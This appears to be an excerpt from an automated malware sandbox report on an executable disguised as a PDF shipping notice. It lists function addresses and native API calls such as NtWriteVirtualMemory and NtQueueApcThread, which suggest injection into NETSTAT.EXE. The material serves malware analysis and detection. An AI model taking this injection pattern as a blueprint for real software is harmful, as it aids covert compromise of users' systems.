Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 1_2_02B715AA 1_2_02B715AA
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 1_2_02B6D199 1_2_02B6D199
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 1_2_02B6FFF2 1_2_02B6FFF2
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 1_2_02B6DB02 1_2_02B6DB02
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EAB0EAD 6_2_1EAB0EAD
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA01EB2 6_2_1EA01EB2
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1E9F2EE8 6_2_1E9F2EE8
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EAB9ED2 6_2_1EAB9ED2
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EAA0E6D 6_2_1EAA0E6D
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA42E48 6_2_1EA42E48
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA20E50 6_2_1EA20E50
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EABEFBF 6_2_1EABEFBF
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA06FE0 6_2_1EA06FE0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EAB1FC6 6_2_1EAB1FC6
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA0CF00 6_2_1EA0CF00
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EABFF63 6_2_1EABFF63
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA99C98 6_2_1EA99C98
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA87CE8 6_2_1EA87CE8
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA1FCE0 6_2_1EA1FCE0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EACACEB 6_2_1EACACEB
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA18CDF 6_2_1EA18CDF
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA0AC20 6_2_1EA0AC20
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1E9F0C12 6_2_1E9F0C12
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA03C60 6_2_1EA03C60
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EAB6C69 6_2_1EAB6C69
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EABEC60 6_2_1EABEC60
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EAAEC4C 6_2_1EAAEC4C
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA12DB0 6_2_1EA12DB0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA9FDF4 6_2_1EA9FDF4
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA09DD0 6_2_1EA09DD0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EABFD27 6_2_1EABFD27
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1E9FAD00 6_2_1E9FAD00
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA00D69 6_2_1EA00D69
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EAB7D4C 6_2_1EAB7D4C
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA1FAA0 6_2_1EA1FAA0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EABFA89 6_2_1EABFA89
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EABCA13 6_2_1EABCA13
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EABEA5B 6_2_1EABEA5B
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA74BC0 6_2_1EA74BC0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EABFB2E 6_2_1EABFB2E
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA00B10 6_2_1EA00B10
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA3DB19 6_2_1EA3DB19
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA798B2 6_2_1EA798B2
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA16882 6_2_1EA16882
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EAB78F3 6_2_1EAB78F3
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA028C0 6_2_1EA028C0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EAB18DA 6_2_1EAB18DA
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EAA0835 6_2_1EAA0835
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA03800 6_2_1EA03800
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA2E810 6_2_1EA2E810
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA09870 6_2_1EA09870
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA1B870 6_2_1EA1B870
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA75870 6_2_1EA75870
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EABF872 6_2_1EABF872
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1E9E6868 6_2_1E9E6868
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EABE9A6 6_2_1EABE9A6
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1E9FE9A0 6_2_1E9FE9A0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA459C0 6_2_1EA459C0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA00680 6_2_1EA00680
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA736EC 6_2_1EA736EC
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EABF6F6 6_2_1EABF6F6
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EABA6C0 6_2_1EABA6C0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1E9FC6E0 6_2_1E9FC6E0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA9D62C 6_2_1EA9D62C
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA1C600 6_2_1EA1C600
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA24670 6_2_1EA24670
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EAAD646 6_2_1EAAD646
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA02760 6_2_1EA02760
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA0A760 6_2_1EA0A760
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EAB6757 6_2_1EAB6757
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA6D480 6_2_1EA6D480
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA00445 6_2_1EA00445
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EABF5C9 6_2_1EABF5C9
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EAB75C6 6_2_1EAB75C6
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EACA526 6_2_1EACA526
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1E9ED2EC 6_2_1E9ED2EC
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EAB124C 6_2_1EAB124C
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1E9F1380 6_2_1E9F1380
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EABF330 6_2_1EABF330
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA0E310 6_2_1EA0E310
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA3508C 6_2_1EA3508C
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1E9F00A0 6_2_1E9F00A0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EAB70F1 6_2_1EAB70F1
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA0B0D0 6_2_1EA0B0D0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EAAE076 6_2_1EAAE076
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA1B1E0 6_2_1EA1B1E0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA051C0 6_2_1EA051C0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1E9EF113 6_2_1E9EF113
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA9D130 6_2_1EA9D130
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EAC010E 6_2_1EAC010E
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA4717A 6_2_1EA4717A
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02FAD2EC 8_2_02FAD2EC
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_0307F330 8_2_0307F330
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_0307124C 8_2_0307124C
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02FB1380 8_2_02FB1380
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02FCE310 8_2_02FCE310
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_0308010E 8_2_0308010E
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02FCB0D0 8_2_02FCB0D0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_0305D130 8_2_0305D130
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02FB00A0 8_2_02FB00A0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02FF508C 8_2_02FF508C
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_0300717A 8_2_0300717A
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02FDB1E0 8_2_02FDB1E0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02FC51C0 8_2_02FC51C0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_0306E076 8_2_0306E076
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02FAF113 8_2_02FAF113
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_030770F1 8_2_030770F1
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02FBC6E0 8_2_02FBC6E0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_03076757 8_2_03076757
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02FC0680 8_2_02FC0680
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02FE4670 8_2_02FE4670
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02FDC600 8_2_02FDC600
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_0305D62C 8_2_0305D62C
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_0306D646 8_2_0306D646
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02FC2760 8_2_02FC2760
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02FCA760 8_2_02FCA760
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_0307A6C0 8_2_0307A6C0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_030336EC 8_2_030336EC
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_0307F6F6 8_2_0307F6F6
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_0308A526 8_2_0308A526
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02FC0445 8_2_02FC0445
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_030775C6 8_2_030775C6
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_0307F5C9 8_2_0307F5C9
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_0302D480 8_2_0302D480
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_0307FB2E 8_2_0307FB2E
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02FDFAA0 8_2_02FDFAA0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_03034BC0 8_2_03034BC0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_0307CA13 8_2_0307CA13
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_0307EA5B 8_2_0307EA5B
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_0307FA89 8_2_0307FA89
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02FFDB19 8_2_02FFDB19
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02FC0B10 8_2_02FC0B10
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02FC28C0 8_2_02FC28C0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02FD6882 8_2_02FD6882
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02FC9870 8_2_02FC9870
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02FDB870 8_2_02FDB870
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02FA6868 8_2_02FA6868
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_0307E9A6 8_2_0307E9A6
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_030059C0 8_2_030059C0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02FEE810 8_2_02FEE810
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02FC3800 8_2_02FC3800
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_03060835 8_2_03060835
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02FBE9A0 8_2_02FBE9A0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_03035870 8_2_03035870
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_0307F872 8_2_0307F872
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_030398B2 8_2_030398B2
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_030718DA 8_2_030718DA
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_030778F3 8_2_030778F3
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02FB2EE8 8_2_02FB2EE8
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_0303FF40 8_2_0303FF40
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02FC1EB2 8_2_02FC1EB2
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_0307FF63 8_2_0307FF63
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02FE0E50 8_2_02FE0E50
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_0307EFBF 8_2_0307EFBF
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_03071FC6 8_2_03071FC6
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02FC6FE0 8_2_02FC6FE0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_03002E48 8_2_03002E48
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_03060E6D 8_2_03060E6D
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_03070EAD 8_2_03070EAD
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_03079ED2 8_2_03079ED2
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02FCCF00 8_2_02FCCF00
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02FDFCE0 8_2_02FDFCE0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_0307FD27 8_2_0307FD27
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02FD8CDF 8_2_02FD8CDF
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_03077D4C 8_2_03077D4C
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02FC3C60 8_2_02FC3C60
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02FCAC20 8_2_02FCAC20
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02FB0C12 8_2_02FB0C12
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_0305FDF4 8_2_0305FDF4
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_0303EC20 8_2_0303EC20
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02FC9DD0 8_2_02FC9DD0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_0306EC4C 8_2_0306EC4C
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02FD2DB0 8_2_02FD2DB0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_0307EC60 8_2_0307EC60
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_03076C69 8_2_03076C69
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02FC0D69 8_2_02FC0D69
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_03059C98 8_2_03059C98
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_0308ACEB 8_2_0308ACEB
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_03047CE8 8_2_03047CE8
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02FBAD00 8_2_02FBAD00
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_0281E26E 8_2_0281E26E
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_0281EB52 8_2_0281EB52
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_0281DE3A 8_2_0281DE3A
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02809E4F 8_2_02809E4F
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02809E50 8_2_02809E50
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02802FB0 8_2_02802FB0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02802D87 8_2_02802D87
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02802D90 8_2_02802D90
Found potential string decryption / allocating functions
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: String function: 02FAB910 appears 268 times
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: String function: 0303EF10 appears 105 times
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: String function: 02FF5050 appears 36 times
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: String function: 03007BE4 appears 96 times
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: String function: 0302E692 appears 86 times
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: String function: 1EA47BE4 appears 96 times
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: String function: 1EA6E692 appears 86 times
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: String function: 1E9EB910 appears 268 times
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: String function: 1EA35050 appears 36 times
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: String function: 1EA7EF10 appears 105 times
Contains functionality to call native functions
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 1_2_02B6CC3A NtAllocateVirtualMemory, 1_2_02B6CC3A
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 1_2_02B6CF85 NtWriteVirtualMemory, 1_2_02B6CF85
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 1_2_02B72FF6 NtWriteVirtualMemory,K32GetDeviceDriverBaseNameA, 1_2_02B72FF6
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 1_2_02B6C7E5 NtWriteVirtualMemory,CreateFileA, 1_2_02B6C7E5
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 1_2_02B72905 NtProtectVirtualMemory, 1_2_02B72905
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 1_2_02B70C8F NtWriteVirtualMemory, 1_2_02B70C8F
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 1_2_02B718FC NtWriteVirtualMemory,LoadLibraryA, 1_2_02B718FC
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 1_2_02B6DB02 NtWriteVirtualMemory, 1_2_02B6DB02
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA32EB0 NtProtectVirtualMemory,LdrInitializeThunk, 6_2_1EA32EB0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA32ED0 NtResumeThread,LdrInitializeThunk, 6_2_1EA32ED0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA32E50 NtCreateSection,LdrInitializeThunk, 6_2_1EA32E50
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA32F00 NtCreateFile,LdrInitializeThunk, 6_2_1EA32F00
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA32CF0 NtDelayExecution,LdrInitializeThunk, 6_2_1EA32CF0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA32C30 NtMapViewOfSection,LdrInitializeThunk, 6_2_1EA32C30
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA32C50 NtUnmapViewOfSection,LdrInitializeThunk, 6_2_1EA32C50
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA32DA0 NtReadVirtualMemory,LdrInitializeThunk, 6_2_1EA32DA0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA32DC0 NtAdjustPrivilegesToken,LdrInitializeThunk, 6_2_1EA32DC0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA32D10 NtQuerySystemInformation,LdrInitializeThunk, 6_2_1EA32D10
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA32B90 NtFreeVirtualMemory,LdrInitializeThunk, 6_2_1EA32B90
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA32BC0 NtQueryInformationToken,LdrInitializeThunk, 6_2_1EA32BC0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA32B10 NtAllocateVirtualMemory,LdrInitializeThunk, 6_2_1EA32B10
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA329F0 NtReadFile,LdrInitializeThunk, 6_2_1EA329F0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA32E80 NtCreateProcessEx, 6_2_1EA32E80
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA32EC0 NtQuerySection, 6_2_1EA32EC0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA32E00 NtQueueApcThread, 6_2_1EA32E00
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA32FB0 NtSetValueKey, 6_2_1EA32FB0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA32F30 NtOpenDirectoryObject, 6_2_1EA32F30
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA33C90 NtOpenThread, 6_2_1EA33C90
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA32CD0 NtEnumerateKey, 6_2_1EA32CD0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA32C20 NtSetInformationFile, 6_2_1EA32C20
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA33C30 NtOpenProcessToken, 6_2_1EA33C30
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA32C10 NtOpenProcess, 6_2_1EA32C10
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA32D50 NtWriteVirtualMemory, 6_2_1EA32D50
